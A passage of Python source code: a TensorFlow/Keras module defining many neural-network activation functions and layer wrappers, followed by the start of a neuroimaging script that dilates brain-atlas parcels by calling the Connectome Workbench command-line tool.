def selu(x):
"""
SELU Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
scale = 1.0507009873554804934193349852946
alpha = 1.6732632423543772848170429916717
return scale * (tf.math.maximum(0.,x) + tf.math.minimum(0.,alpha*(tf.math.exp(x)-1.)))
def celu(x, alpha=1.0):
"""
CELU Activation Function
Parameters
----------
x : tensor object
alpha : int, float, default=1.0
Returns
-------
tensor
"""
return tf.math.maximum(0.,x) + tf.math.minimum(0.,alpha*(tf.math.exp(x/alpha)-1.))
def arcTan(x):
"""
ArcTang Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.atan(x)
def Shifted_SoftPlus(x):
"""
Shifted Softplus Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.log(0.5 + 0.5*tf.math.exp(x))
def softmax(x):
"""
Softmax Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.keras.activations.softmax(x, axis=-1)
def logit(x):
"""
Logit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (1.-x)
def gelu(x):
"""
Gaussian Error Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.keras.activations.gelu(x)
def softsign(x):
"""
Softsign Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (tf.math.abs(x) + 1.)
def elish(x):
"""
Exponential Linear Squashing Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>=0., x/(1.+tf.math.exp(-x)), ((tf.math.exp(x)-1.)/(1.+tf.math.exp(-x))))
return x
def hardELiSH(x):
"""
Hard Exponential Linear Squashing Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>=0., x*tf.math.maximum(0., tf.math.minimum(1., (x+1.)/2.)), (tf.math.exp(x)-1.)*tf.math.maximum(0., tf.math.minimum(1., (x+1.)/2.)))
return x
def serf(x):
"""
Log-Softplus Error Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tf.math.erf(tf.math.log(1.+tf.math.exp(x)))
def elu(x, alpha):
"""
Exponential Linear Unit Activation Function
Parameters
----------
x : tensor object
alpha : int,float
Returns
-------
tensor
"""
x = tf.where(x>0., x, alpha*tf.math.exp(x)-1.)
return x
def phish(x):
"""
Phish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tanh(gelu(x))
def qrelu(x):
"""
Quantum Rectifier Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.where(x>0.,x,(0.01*(x-2))*x)
def mqrelu(x):
"""
modified QReLU Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.where(x>0.,x,(0.01*(x)) - x)
def frelu(x, b):
"""
Flexible Rectified Linear Unit (FReLU) Activation Function
Parameters
----------
x : tensor object
b : int, float
Returns
-------
tensor
"""
return tf.where(x>0.,x+b,b)
class SoftShrink(tf.keras.layers.Layer):
def __init__(self, lamd=1.0, trainable=False, **kwargs):
"""
Soft Shrinkage (Softshrink) Activation Layer
Parameters
----------
lamd : int, float
lamd factor.
"""
super(SoftShrink, self).__init__(**kwargs)
self.supports_masking = True
self.lamd = lamd
self.trainable = trainable
def build(self, input_shape):
self.lambda_factor = K.variable(self.lamd,
dtype=K.floatx(),
name='lambda_factor')
if self.trainable:
self._trainable_weights.append(self.lambda_factor)
super(SoftShrink, self).build(input_shape)
def call(self, inputs, mask=None):
return softSHRINK(inputs, self.lamd)
def get_config(self):
config = {'lambda': self.get_weights()[0] if self.trainable else self.lamd,
'trainable': self.trainable}
base_config = super(SoftShrink, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape
class HardShrink(tf.keras.layers.Layer):
def __init__(self, lamd=1.0, trainable=False, **kwargs):
"""
Hard Shrinkage (Hardshrink) Activation Layer
Parameters
----------
lamd : int, float
lamd factor.
"""
super(HardShrink, self).__init__(**kwargs)
self.supports_masking = True
self.lamd = lamd
self.trainable = trainable
def build(self, input_shape):
self.lambda_factor = K.variable(self.lamd,
dtype=K.floatx(),
name='lambda_factor')
if self.trainable:
self._trainable_weights.append(self.lambda_factor)
super(HardShrink, self).build(input_shape)
def call(self, inputs, mask=None):
return hard_shrink(inputs, self.lamd)
def get_config(self):
config = {'lambda': self.get_weights()[0] if self.trainable else self.lamd,
'trainable': self.trainable}
base_config = super(HardShrink, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape
class GLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
GLU Activation Layer
"""
super(GLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
out, gate = tf.split(x, num_split=2, axis=self.dim)
gate = tf.sigmoid(gate)
x = tf.multiply(out, gate)
return x
class Bilinear(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
Bilinear Activation Layer
"""
super(Bilinear, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
out, gate = tf.split(x, num_split=2, axis=self.dim)
x = tf.multiply(out, gate)
return x
class ReGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
ReGLU Activation Layer
"""
super(ReGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
out, gate = tf.split(x, num_split=2, axis=self.dim)
gate = tf.nn.relu(gate)
x = tf.multiply(out, gate)
return x
class GeGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
GeGLU Activation Layer
"""
super(GeGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
out, gate = tf.split(x, num_split=2, axis=self.dim)
gate = tf.keras.activations.gelu(gate)
x = tf.multiply(out, gate)
return x
class SwiGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
SwiGLU Activation Layer
"""
super(SwiGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
out, gate = tf.split(x, num_split=2, axis=self.dim)
gate = tf.keras.activations.swish(gate)
x = tf.multiply(out, gate)
return x
class SeGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
SeGLU Activation Layer
"""
super(SeGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
out, gate = tf.split(x, num_split=2, axis=self.dim)
gate = tf.keras.activations.selu(gate)
x = tf.multiply(out, gate)
return x
class ReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Rectified Linear Unit Activation Layer
"""
super(ReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return relu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Identity(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Linear Activation Layer f(x)=x
"""
super(Identity, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Identity, self).build(input_shape)
def call(self, inputs, mask=None):
return identity(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Step(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Binary Step Activation Layer
"""
super(Step, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Step, self).build(input_shape)
def call(self, inputs, mask=None):
return step(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Sigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Sigmoid Activation Layer
"""
super(Sigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Sigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class HardSigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Sigmoid Activation Layer
"""
super(HardSigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardSigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return hard_sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class LogSigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
LogSigmoid Activation Layer
"""
super(LogSigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(LogSigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return log_sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class SiLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Sigmoid Linear Unit Activation Layer
"""
super(SiLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SiLU, self).build(input_shape)
def call(self, inputs, mask=None):
return silu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ParametricLinear(tf.keras.layers.Layer):
def __init__(self, alpha=1., **kwargs):
"""
Linear Activation Layer with parameter alpha
Parameters
----------
alpha : int, float default=1.0
"""
super(ParametricLinear, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(ParametricLinear, self).build(input_shape)
def call(self, inputs, mask=None):
return parametric_linear(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class PiecewiseLinear(tf.keras.layers.Layer):
def __init__(self, xmin, xmax, **kwargs):
"""
Piecewise Linear Activation Layer
Parameters
----------
xmin : int, float
min range.
xmax : int, float
max range.
"""
super(PiecewiseLinear, self).__init__(**kwargs)
self.supports_masking = True
self.xmin = xmin
self.xmax = xmax
def build(self, input_shape):
super(PiecewiseLinear, self).build(input_shape)
def call(self, inputs, mask=None):
return piecewise_linear(inputs, self.xmin, self.xmax)
def compute_output_shape(self, input_shape):
return input_shape
class CLL(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Complementary Log-Log Activation Layer
"""
super(CLL, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(CLL, self).build(input_shape)
def call(self, inputs, mask=None):
return cll(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Bipolar(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Bipolar Activation Layer
"""
super(Bipolar, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Bipolar, self).build(input_shape)
def call(self, inputs, mask=None):
return bipolar(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class BipolarSigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Bipolar Sigmoid Activation Layer
"""
super(BipolarSigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(BipolarSigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return bipolar_sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Tanh(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hyperbolic Tangent Activation Layer
"""
super(Tanh, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Tanh, self).build(input_shape)
def call(self, inputs, mask=None):
return tanh(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class TanhShrink(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
TanhShrink Activation Layer
"""
super(TanhShrink, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(TanhShrink, self).build(input_shape)
def call(self, inputs, mask=None):
return tanhshrink(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class LeCunTanh(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
LeCun's Tanh Activation Layer
"""
super(LeCunTanh, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(LeCunTanh, self).build(input_shape)
def call(self, inputs, mask=None):
return leCun_tanh(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class HardTanh(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Tanh Activation Layer
"""
super(HardTanh, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardTanh, self).build(input_shape)
def call(self, inputs, mask=None):
return hard_tanh(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class TanhExp(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Tanh Exponential Activation Layer
"""
super(TanhExp, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(TanhExp, self).build(input_shape)
def call(self, inputs, mask=None):
return tanh_exp(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ABS(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Absolute Activation Layer
"""
super(ABS, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ABS, self).build(input_shape)
def call(self, inputs, mask=None):
return Abs(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class SquaredReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Squared Rectified Linear Unit Activation Layer
"""
super(SquaredReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SquaredReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return squared_relu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ParametricReLU(tf.keras.layers.Layer):
def __init__(self, alpha=0.001, **kwargs):
"""
Parametric Rectified Linear Unit Activation Layer
Parameters
----------
alpha : int, float default=0.001
"""
super(ParametricReLU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(ParametricReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Parametric_ReLU(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class RandomizedReLU(tf.keras.layers.Layer):
def __init__(self, lower=0., upper=1., **kwargs):
"""
Randomized Leaky Rectified Linear Unit Activation Layer
Parameters
----------
lower : int, float default=0
lower range for random.uniform.
upper : int, float default=1
upper range for random.uniform.
"""
super(RandomizedReLU, self).__init__(**kwargs)
self.supports_masking = True
self.lower = lower
self.upper = upper
def build(self, input_shape):
super(RandomizedReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Randomized_ReLU(inputs, self.lower, self.upper)
def compute_output_shape(self, input_shape):
return input_shape
class LeakyReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Leaky Rectified Linear Unit Activation Layer
"""
super(LeakyReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(LeakyReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return leaky_ReLU(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ReLU6(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
ReLU6 Activation Layer
"""
super(ReLU6, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ReLU6, self).build(input_shape)
def call(self, inputs, mask=None):
return relu6(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ModReLU(tf.keras.layers.Layer):
def __init__(self, bias, **kwargs):
"""
Mod Rectified Linear Unit Activation Layer
Parameters
----------
bias : int, float
"""
super(ModReLU, self).__init__(**kwargs)
self.supports_masking = True
self.bias = bias
def build(self, input_shape):
super(ModReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Mod_ReLU(inputs, self.bias)
def compute_output_shape(self, input_shape):
return input_shape
class CosReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Cosine ReLU Activation Layer
a = σ(z) = max(0, z) + cos(z)
"""
super(CosReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(CosReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Cos_ReLU(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class SinReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Sin ReLU Activation Layer
a = σ(z) = max(0, z) + sin(z)
"""
super(SinReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SinReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Sin_ReLU(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Probit(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Probit Activation Layer also known as Cumulative distribution function (CDF)
"""
super(Probit, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Probit, self).build(input_shape)
def call(self, inputs, mask=None):
return probit(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Cos(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Cos Activation Layer
"""
super(Cos, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Cos, self).build(input_shape)
def call(self, inputs, mask=None):
return Cosine(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Gaussian(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Gaussian Activation Layer
"""
super(Gaussian, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Gaussian, self).build(input_shape)
def call(self, inputs, mask=None):
return gaussian(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Multiquadratic(tf.keras.layers.Layer):
def __init__(self, px, py, **kwargs):
"""
Multiquadratic Activation Layer
Parameters
----------
px: float
x dimension of chosen point
py: float
y dimension of chosen point
notes
-----
px and py must be float otherwise it will get an error.
"""
super(Multiquadratic, self).__init__(**kwargs)
self.supports_masking = True
self.px = px
self.py = py
def build(self, input_shape):
super(Multiquadratic, self).build(input_shape)
def call(self, inputs, mask=None):
return Multi_quadratic(inputs, self.px, self.py)
def compute_output_shape(self, input_shape):
return input_shape
class InvMultiquadratic(tf.keras.layers.Layer):
def __init__(self, px, py, **kwargs):
"""
Inverse Multiquadratic Activation Layer
Parameters
----------
px: float
x dimension of chosen point
py: float
y dimension of chosen point
notes
-----
px and py must be float otherwise it will get an error.
"""
super(InvMultiquadratic, self).__init__(**kwargs)
self.supports_masking = True
self.px = px
self.py = py
def build(self, input_shape):
super(InvMultiquadratic, self).build(input_shape)
def call(self, inputs, mask=None):
return Inv_Multi_quadratic(inputs, self.px, self.py)
def compute_output_shape(self, input_shape):
return input_shape
class SoftPlus(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Softplus or Smooth ReLU Activation Layer
"""
super(SoftPlus, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SoftPlus, self).build(input_shape)
def call(self, inputs, mask=None):
return softPlus(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Mish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Mish Activation Layer
"""
super(Mish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Mish, self).build(input_shape)
def call(self, inputs, mask=None):
return mish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Smish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Mish Activation Layer
"""
super(Smish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Smish, self).build(input_shape)
def call(self, inputs, mask=None):
return smish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ParametricSmish(tf.keras.layers.Layer):
def __init__(self, alpha = 1., beta = 1., **kwargs):
"""
Parametric Smish Activation Layer
Parameters
----------
alpha : float, default=1.
alpha weight.
beta : float, default=1.
beta weight.
notes
-----
alpha and beta must be float otherwise it will get an error.
"""
super(ParametricSmish, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
self.beta = beta
def build(self, input_shape):
super(ParametricSmish, self).build(input_shape)
def call(self, inputs, mask=None):
return Parametric_Smish(inputs, self.alpha, self.beta)
def compute_output_shape(self, input_shape):
return input_shape
class Swish(tf.keras.layers.Layer):
def __init__(self, beta = 1., **kwargs):
"""
Swish Activation Layer
Parameters
----------
beta : int, float default=1.
"""
super(Swish, self).__init__(**kwargs)
self.supports_masking = True
self.beta = beta
def build(self, input_shape):
super(Swish, self).build(input_shape)
def call(self, inputs, mask=None):
return swish(inputs, self.beta)
def compute_output_shape(self, input_shape):
return input_shape
class ESwish(tf.keras.layers.Layer):
def __init__(self, beta = 1., **kwargs):
"""
E-Swish Activation Layer
Parameters
----------
beta : int, float default=1.
"""
super(ESwish, self).__init__(**kwargs)
self.supports_masking = True
self.beta = beta
def build(self, input_shape):
super(ESwish, self).build(input_shape)
def call(self, inputs, mask=None):
return eswish(inputs, self.beta)
def compute_output_shape(self, input_shape):
return input_shape
class HardSwish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Swish Activation Layer
"""
super(HardSwish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardSwish, self).build(input_shape)
def call(self, inputs, mask=None):
return hardSwish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class GCU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Growing Cosine Unit Activation Layer
"""
super(GCU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(GCU, self).build(input_shape)
def call(self, inputs, mask=None):
return gcu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class CoLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Collapsing Linear Unit Activation Layer
"""
super(CoLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(CoLU, self).build(input_shape)
def call(self, inputs, mask=None):
return colu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class PELU(tf.keras.layers.Layer):
def __init__(self, c, b, alpha, **kwargs):
"""
Parametric Exponential Linear Unit Activation Layer
Parameters
----------
alpha : int, float
c : int, float
b : int, float
"""
super(PELU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
self.b = b
self.c = c
def build(self, input_shape):
super(PELU, self).build(input_shape)
def call(self, inputs, mask=None):
return pelu(inputs, self.c, self.b,self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class SELU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
SELU Activation Layer
"""
super(SELU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SELU, self).build(input_shape)
def call(self, inputs, mask=None):
return selu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class CELU(tf.keras.layers.Layer):
def __init__(self, alpha=1.0, **kwargs):
"""
CELU Activation Layer
Parameters
----------
alpha : int, float, default=1.0
"""
super(CELU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(CELU, self).build(input_shape)
def call(self, inputs, mask=None):
return celu(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class ArcTan(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
ArcTang Activation Layer
"""
super(ArcTan, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ArcTan, self).build(input_shape)
def call(self, inputs, mask=None):
return arcTan(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ShiftedSoftPlus(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Shifted Softplus Activation Layer
"""
super(ShiftedSoftPlus, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ShiftedSoftPlus, self).build(input_shape)
def call(self, inputs, mask=None):
return Shifted_SoftPlus(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Softmax(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Softmax Activation Layer
"""
super(Softmax, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Softmax, self).build(input_shape)
def call(self, inputs, mask=None):
return softmax(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Logit(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Logit Activation Layer
"""
super(Logit, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Logit, self).build(input_shape)
def call(self, inputs, mask=None):
return logit(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class GELU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Gaussian Error Linear Unit Activation Layer
"""
super(GELU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(GELU, self).build(input_shape)
def call(self, inputs, mask=None):
return gelu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Softsign(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Softsign Activation Layer
"""
super(Softsign, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Softsign, self).build(input_shape)
def call(self, inputs, mask=None):
return softsign(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ELiSH(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Exponential Linear Squashing Activation Layer
"""
super(ELiSH, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ELiSH, self).build(input_shape)
def call(self, inputs, mask=None):
return elish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class HardELiSH(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Exponential Linear Squashing Activation Layer
"""
super(HardELiSH, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardELiSH, self).build(input_shape)
def call(self, inputs, mask=None):
return hardELiSH(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Serf(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Log-Softplus Error Activation Layer
"""
super(Serf, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Serf, self).build(input_shape)
def call(self, inputs, mask=None):
return serf(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ELU(tf.keras.layers.Layer):
def __init__(self, alpha, **kwargs):
"""
Exponential Linear Unit Activation Layer
Parameters
----------
alpha : int,float
"""
super(ELU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(ELU, self).build(input_shape)
def call(self, inputs, mask=None):
return elu(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class Phish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Phish Activation Layer
"""
super(Phish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Phish, self).build(input_shape)
def call(self, inputs, mask=None):
return phish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class QReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Quantum Rectifier Linear Unit Activation Layer
"""
super(QReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(QReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return qrelu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class MQReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
modified QReLU Activation Layer
"""
super(MQReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(MQReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return mqrelu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class FReLU(tf.keras.layers.Layer):
def __init__(self, b, **kwargs):
"""
Flexible Rectified Linear Unit Activation Layer
Parameters
----------
b : int, float
"""
super(FReLU, self).__init__(**kwargs)
self.supports_masking = True
self.b = b
def build(self, input_shape):
super(FReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return frelu(inputs, self.b)
def compute_output_shape(self, input_shape):
return input_shape | ActTensor-tf | /ActTensor_tf-1.0.tar.gz/ActTensor_tf-1.0.0/ActTensor_tf/activations.py | activations.py |
import numpy as np
import nibabel as nib
import pkg_resources
import os
## global variables for directories and atlas information
# CAB-NP directory
partitiondir = pkg_resources.resource_filename('ActflowToolbox.dependencies', 'ColeAnticevicNetPartition/')
# label file
defaultdlabelfile = partitiondir + 'CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
# surface file
leftSurface = partitiondir + 'S1200.L.inflated_MSMAll.32k_fs_LR.surf.gii'
rightSurface = partitiondir + 'S1200.R.inflated_MSMAll.32k_fs_LR.surf.gii'
# output cortex file directory
dilatedmaskdir_cortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'Glasser2016/surfaceMasks/')
# output subcortex file directory
dilatedmaskdir_subcortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/volumeMasks/')
def dilateParcels(dilateMM=10,verbose=True):
'''
This script dilates individual parcels by x mm
Purpose is to use this as a mask to exclude any vertices within 10mm
of a parcel when estimaing FC via either ridge or multiple linear regression.
Dilates all parcels (cortex and subcortex)
Requires connectome workbench
PARAMETERS:
dilateMM : dilation in mm (default=10)
verbose : prints current roi
'''
dlabels = np.squeeze(nib.load(defaultdlabelfile).get_data())
parcel_list = np.unique(dlabels)
for parcel in parcel_list:
if verbose:
print('Dilating parcel', np.int(parcel))
parcel_array = np.zeros(dlabels.shape)
# Find all vertices that don't correspond to this ROI`
roi_ind = np.where(dlabels==parcel)[0]
parcel_array[roi_ind] = 1.0
if parcel < 361:
maskfile = dilatedmaskdir_cortex + 'GlasserParcel' + str(np.int(parcel))
dilatedfile= dilatedmaskdir_cortex + 'GlasserParcel' + str(np.int(parcel)) + '_dilated_' + str(dilateMM) + 'mm'
else:
maskfile = dilatedmaskdir_subcortex + 'CabnpParcel' + str(np.int(parcel))
dilatedfile= dilatedmaskdir_subcortex + 'CabnpParcel' + str(np.int(parcel)) + '_dilated_' + str(dilateMM) + 'mm'
# Write out masks to a dscalar file
np.savetxt(maskfile + '.csv', parcel_array, fmt='%s')
# Specify output of ROI specific mask and workbench commands
wb_command = 'wb_command -cifti-convert -from-text ' + maskfile + '.csv ' + defaultdlabelfile + ' ' + maskfile + '.dscalar.nii -reset-scalars'
os.system(wb_command)
# Now dilate masks
